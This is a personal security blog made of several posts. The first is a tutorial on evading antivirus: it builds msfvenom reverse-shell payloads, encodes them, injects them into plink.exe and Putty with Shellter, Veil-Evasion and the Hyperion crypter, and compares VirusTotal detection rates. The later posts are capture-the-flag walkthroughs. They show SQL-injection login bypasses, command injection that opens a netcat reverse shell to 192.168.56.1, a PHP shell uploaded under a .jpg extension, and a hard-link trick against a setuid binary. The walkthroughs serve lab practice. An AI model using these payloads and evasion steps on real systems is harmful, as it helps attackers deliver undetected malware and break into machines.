Friday, 10 March 2017

VirusTotal challenge

Hello everyone,

Today I would like to present several methods of antivirus mechanisms evasion.

Within this article I will use couple tools such as: metasploit, shellter, veil-evasion.

Conclusion of the article will be comparison of efficiency generated payloads.

1. Metasploit Framework
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe
 I think that it is so potty result - 43/59 AV verified that our paylaod is malicious.

Let's try generate the same payload but with encoding
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
 The same potty result.

Now, let's try inject our malicious payload into other program.
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
 Better, but still it isn't suit us.

  • cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
    cp /usr/share/windows-binaries/Hyperion-1.0.zip .
    unzip Hyperion-1.0.zip
    cd Hyperion-1.0/
    i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
    wine hyperion.exe ../backdoor.exe ../crypted.exe

 Hmmm, still to high detection ratio.

2. Veil-evasion
Veil evasion is a very useful tool which is compatible with metasploit payloads.

Let's lists payloads

Good, let's use for example payload 35.
 Quite nice! Detection ratio is lower than 50%.

3. Shellter
Shellter is the most effective tool to bypass AV detection. Shellter utilize no-malcious program such as putty.exe and incject malicious instruction.

We can use A (automation) mode. Next we have to set PE target - file which we will inject.
 Great! For me detection ratio is very low, isn't it?

As we can see shellter is very effective tool to AV evasion.


 


at

Monday, 13 February 2017

DC146:2016 dick dastardly

Hello,

Now it is turn to dick dastardly challenge!

Scanning all ports...






Enumerating web pages


















Excellent! The dirb scanner found several interesting files on our target.
The admin.php redirect us to index.php










Very interesting. Filling in username as admin and password as ' OR 1=1 -- - we have got following result





















Nice! Now we are able to use sqlmap and try to find valid credentials.








Good, let's enumerate deeper! Unfortunately we are not able to retrieve databases names. So, we have to look for other opportunity to get these names.











Excellent! We found second vulnerable parameter. Let's enumerate databases






Very good, let's examine vulnhub database.
Database: vulnhub
Table: admins
[1 entry]
+----+--------------------------------------+--------+
| id | pass                                 | user   |
+----+--------------------------------------+--------+
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
+----+--------------------------------------+--------+
It is not SSH valid password for rasta username :( I don't know for what is the password.
After clicking on add IP to IRC whitelist I performed nmap scanning again and I have got very interesting result













Very good! I installed irssi on my attacker machine and I connected to our target IRC.















at

Thursday, 9 February 2017

DC146:2016 fortress challenge

Hello,
Now it is time to struggle with fortress challenge.

Scanning phase gave us following result









Our situation is very simple, but only three open ports.
So, let's begin our penetration tests from web application.













Excellent! We discovered scanner.php file. Let's examine it.












OK, we know how work this scanner. We know how looks like nmap command which is utilize by the scanner.









We added id, so let's verify how looks like result.
















Excellent! It works.So, let's try examine target deeper.













Great! We have got something like one line from /etc/shadow.
After a lot of time...
$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?
 Good, so we know that SSH port is open.


























We obtained limited shell!Unfortunately goal of this challenge is finding flags only.

Flag #1
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
$ pwd
/usr/home/craven
Flag #2
Looking for next flag I found in the /usr/local/www/ directory
$ ls
index.html    k1ngd0m_k3yz    logo.png    s1kr3t        scanner.php    styles.css
$ cd s1kr3t/
$ ls
flag.txt
$ cat flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
Flag #3
The last flag is located in /home/vulnhub/ directory
$ ls
flag.txt    reader
$ cat flag.txt
cat: flag.txt: Permission denied
Hmmm, it is not surprise for me :-) So, let's examine reader file
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ./reader
./reader [file to read]
Very useful! We know that we are able to read some files using reader file.
$ ./reader /etc/passwd
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
Hmmm, a little strange.
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
Hmmm, let's try create symlink for flag.txt
$ ln -s flag.txt /tmp/flagg.txt
$ ./reader /tmp/flagg.txt
Checking file type...
Symbolic links not allowed!
Grrrr, maybe hard link will conduct us to success?
$ ln -f flag.txt /tmp/flagh.txt
$ ./reader /tmp/flagh.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
$ ln -f flag.txt /tmp/test
$ ./reader /tmp/test
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
It is end of the challenge :)
at

Tuesday, 24 January 2017

DC146:2016 basement challenge

Hello,

Today I would like to present dc416-2016-basement challenge walkthrough.

Nmap port scanning.

Looking for our target, we discovered that the machine has assigned 192.168.253.30 IP address.

Now, let's try check what kind of services serves our target.










OK, nmap scanning has discovered 4 open ports. We can see that the target uses port 8080 as a HTTP Proxy. Hmmm, interesting.

Let's begin our penetration test from 80 HTTP port.














I run DirBuster, but it doesn't find anything interesting and useful... So let's check what is hosted on port 10000.








Hmmm, maybe we should try play with it via netcat?






Probably on port 10000 is something like a ping -c [number of packets] 127.0.0.1.

Maybe we will be able to inject some command to obtain reverse shell.
Do to that, we have to import os.system, so let's do that!





Very good, we executed id command on victim's OS.

We are able to obtain reverse shell using __import__('os').system('nc -nv 192.168.56.1 53 -e /bin/sh')







Excellent! We have got limited shell.
jack@basement:~$ ls
ls
flag.txt  ping.py  run_ping.sh
jack@basement:~$ cat flag.txt
cat flag.txt
flag{j4cks_t0t4L_l4cK_0f_$uRpr1sE}
Good :)


at

Friday, 13 January 2017

HackDay Albania 2016

Hello,

Description
This was used in HackDay Albania's 2016 CTF.

Scanning phase
Our nmap scanning show us, that our target has assigned 192.168.56.101 address.

So, looking at the host deeper, we can see that there are couple open ports.








Good, let's begin our penetration test from 8008 port.














Nice picture. Let's look at robots.txt file
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
Good, let's add this path to some kind of dictionary and run Dirbuster.













Hmmm, /unisxcudkqjydw/ has smaller size of response than other. So, let's look at this path deeper.









OK, let's examine /vulnbank/











Great! Clicking on client/ directory











Excellent! But we don't know valid credentials. Unfortunately default credentials doesn't work... Let's try SQL Injection technique.










And indeed, very interesting, isn't it? Trying admin' || 1=1 # and password abcd, we are logged in!









Excellent, we are able to upload some file using Browse button.
I tried upload *.php file, but I have got message that the application allows only picture extensions such as *.jpeg, *.jpg, etc...
So, let's change extension of our PHP reverse shell from *.php to *.jpg.










Using python3.5 -c "import pty;pty.spawn('/bin/bash')" we can spawn shell.
Looking at config.php we can find












Unfortunately databases don't have useful passwords for us.
Looking at /etc/passwd, we can see useful information
-rw-r--rw- 1 root root 1623 Oct 22 17:21 /etc/passwd
Good, we are able to edit passwd file. So, we are able to add certain user with known password with root privileges.



at

Thursday, 12 January 2017

Wallaby's: Nightmare (1.0.2)

Hi,

Today I want to present Wallaby's: Nightmare (1.0.2) walkthrough.

Scanning phase









Good, we know that our target has assigned IP 1921.68.56.100 or 192.168.56.101.
Let's try investigate .101 deeper using nmap scanner with -p- -sV options.






Great, the result provided us to very juicy information such as open ports and version of services which are hosted on it.

Let's begin our penetration test for web application.










Interesting, isn't it? Let's try use test username.

















Our username is used in the application, hmmm. Clicking on "Start the CTF!" we are redirected to certain page















Nothing interesting? Let's look at the URL, we can utilize page parameter to try LFI or RFI.









Bingo! This parameter is vulnerable to LFI! But unfortunately after this action I have got...












It's not issue with my network connection :-( I am confused, so let's try use nmap again.






Wow! port 80 is not open, but we can see that new port has been opened - 60080! Let's investigate this port!











Looking for some useful URL's I tried this URL address which I know









Bingo! There is also LFI vulnerability! Trying read /etc/shadow I haven;t got result.
I spent a lot of time on searching method or files which I will be able to display, I guessed mailer file.







Interesting, let's look at source code



















Hmmm, in the source code, we can see that mailer file has mail parameter. Let's play with it.








Excellent! mail parameter can execute bash command!
























Great! We have limited shell! Let's investigate what kind of privileges we have.
















Good, we have full control on firewall, so le'ts flush rules.











OK, let's try connect to the IRC (port 6667) which was filtered before our action.
Now we are able to connect to the IRC.

[TBU]



at
Subscribe to: Posts ( Atom )